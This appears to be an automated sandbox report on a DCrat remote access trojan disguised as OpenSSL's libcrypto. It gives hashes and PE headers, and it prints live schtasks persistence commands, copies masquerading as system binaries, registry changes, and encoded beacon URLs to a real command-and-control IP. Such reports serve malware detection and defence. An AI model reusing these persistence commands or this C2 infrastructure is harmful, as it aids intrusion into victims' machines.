File name: | 2a7f476688e3754d34f958f14887b398.exe |
Full analysis: | https://app.any.run/tasks/728657dd-a9a9-45d6-9e22-5078dad76578 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | March 31, 2023, 21:23:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 2A7F476688E3754D34F958F14887B398 |
SHA1: | E9ACBD7B2BF62B6AA084467E3EA7666B8EADA109 |
SHA256: | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
SSDEEP: | 24576:0MsMQQGIgIj7T5rhtE5nrYG80jF5jJQdMluoiz8mYhX:lsMQCgEe3q1oilYh |
Extension | Detected file type (score) |
---|---|
.exe | Generic CIL Executable (.NET, Mono, etc.) (45.1) |
.exe | Win32 Executable MS Visual C++ (generic) (19.2) |
.exe | Win64 Executable (generic) (17) |
.scr | Windows screen saver (8) |
.dll | Win32 Dynamic Link Library (generic) (4) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2022:07:24 15:13:08+00:00 |
ImageFileCharacteristics: | Executable, No line numbers, No symbols, Large address aware, 32-bit |
PEType: | PE32 |
LinkerVersion: | 6 |
CodeSize: | 1337856 |
InitializedDataSize: | 13824 |
UninitializedDataSize: | - |
EntryPoint: | 0x1489ae |
OSVersion: | 4 |
ImageVersion: | - |
SubsystemVersion: | 4 |
Subsystem: | Windows GUI |
FileVersionNumber: | 1.1.1.15 |
ProductVersionNumber: | 1.1.1.15 |
FileFlagsMask: | 0x003f |
FileFlags: | (none) |
FileOS: | Win32 |
ObjectFileType: | Dynamic link library |
FileSubtype: | - |
LanguageCode: | English (U.S.) |
CharacterSet: | Unicode |
CompanyName: | - |
FileDescription: | - |
FileVersion: | 1.1.1o |
InternalName: | libcrypto |
OriginalFileName: | libcrypto |
ProductName: | - |
ProductVersion: | 1.1.1o |
LegalCopyright: | Copyright 1998-2022 The OpenSSL Authors. All rights reserved. |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 24-Jul-2022 15:13:08 |
Detected languages: | |
CompanyName: | - |
FileDescription: | - |
FileVersion: | 1.1.1o |
InternalName: | libcrypto |
OriginalFilename: | libcrypto |
ProductName: | - |
ProductVersion: | 1.1.1o |
LegalCopyright: | Copyright 1998-2022 The OpenSSL Authors. All rights reserved. |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 4 |
Time date stamp: | 24-Jul-2022 15:13:08 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x001469B4 | 0x00146A00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 7.1048 |
.sdata | 0x0014A000 | 0x00002FDF | 0x00003000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.24203 |
.rsrc | 0x0014E000 | 0x0000031C | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 2.64338 |
.reloc | 0x00150000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.10191 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.33524 | 708 | UNKNOWN | English - United States | RT_VERSION |
Imports |
---|
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
1636 | "C:\Users\admin\AppData\Local\Temp\2a7f476688e3754d34f958f14887b398.exe" | C:\Users\admin\AppData\Local\Temp\2a7f476688e3754d34f958f14887b398.exe | | explorer.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0; Version: 1.1.1o |
1216 | schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Users\admin\Cookies\lsm.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
836 | schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Users\admin\Cookies\lsm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1196 | schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Users\admin\Cookies\lsm.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1452 | schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Documents\services.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1260 | schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Documents\services.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2164 | schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Documents\services.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2332 | schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Windows\tracing\explorer.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2428 | schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\tracing\explorer.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2524 | schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Windows\tracing\explorer.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Key | Operation | Name | Value |
---|---|---|---|---|---|
1636 | 2a7f476688e3754d34f958f14887b398.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Windows\Tasks\886983d96e3d3e | text | B1C526DB6ED2A7463D5CC997B1FFE12C | DC0B8862388775504805AF113E4537D741949FEC0DA44E70A652411AD9EC9430 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Windows\Tasks\csrss.exe | executable | 2A7F476688E3754D34F958F14887B398 | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\Public\Documents\c5b4cb5e9653cc | text | C0AFDDAE94EB1059BD3074A4936AABAB | 054A00EA473B26BB4BB5E78494E82911DEDBCEC5AE1E6A95561FCFA75A91FB58 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Windows\tracing\explorer.exe | executable | 2A7F476688E3754D34F958F14887B398 | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\Public\Documents\services.exe | executable | 2A7F476688E3754D34F958F14887B398 | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\csrss.exe | executable | 2A7F476688E3754D34F958F14887B398 | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\lsm.exe | executable | 2A7F476688E3754D34F958F14887B398 | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\ProgramData\Adobe\ARM\Reader_15.007.20033\2a7f476688e3754d34f958f14887b398.exe | executable | 2A7F476688E3754D34F958F14887B398 | 02B1070B1D2CCF57124AE0AF4A9F4748C63287FB9D1A84FAF94B5E3F313A8E52 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\101b941d020240 | text | 4D9E6228360678690C9C6CF02A075CAE | 56109DC5040D91E0B6375AACA1CFA2601C081DC084A3828AE4CE7BACE2976901 |
1636 | 2a7f476688e3754d34f958f14887b398.exe | C:\ProgramData\Adobe\ARM\Reader_15.007.20033\1f09b7cb87a861 | text | 3377B582A9FCD8DCB63C3D3E2D14B81A | AE4588309D6A76DD77DAD00B01B7AB217C6D26244264E8E599AE2B8B4BABA76B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&deeaf6476c58a3f1b726bc4bddc4a8e2=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 | FI | text | 2.14 Kb | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?dCyX4oXrMycPus=e2&LJXSRopXhIRHpYRkkDuDCY8wWdPJ90=4DESyDKvJsgH&ZEJD7KH7=z3wLk6xZgYqwXElFdhZSkVfR&a2e9c0159d198200f9db62a53d639a8f=8970924aabf2c4ce73108f2068e0f32f&20e5506d7ac514eded4e5e7e8ef2b124=gYkZTM1EGOyEGN4EGOzYjZkRzNyIzY3UWOiZGNwEGMzcTNmRDNzM2Y&dCyX4oXrMycPus=e2&LJXSRopXhIRHpYRkkDuDCY8wWdPJ90=4DESyDKvJsgH&ZEJD7KH7=z3wLk6xZgYqwXElFdhZSkVfR | FI | text | 2.14 Kb | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=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 | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=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 | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=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 | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=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 | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoV
zajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=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 | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=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 | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=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 | FI | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2116 | csrss.exe | 135.181.106.220:80 | — | Hetzner Online GmbH | FI | malicious |
PID | Process | Class | Message |
---|---|---|---|
2116 | csrss.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |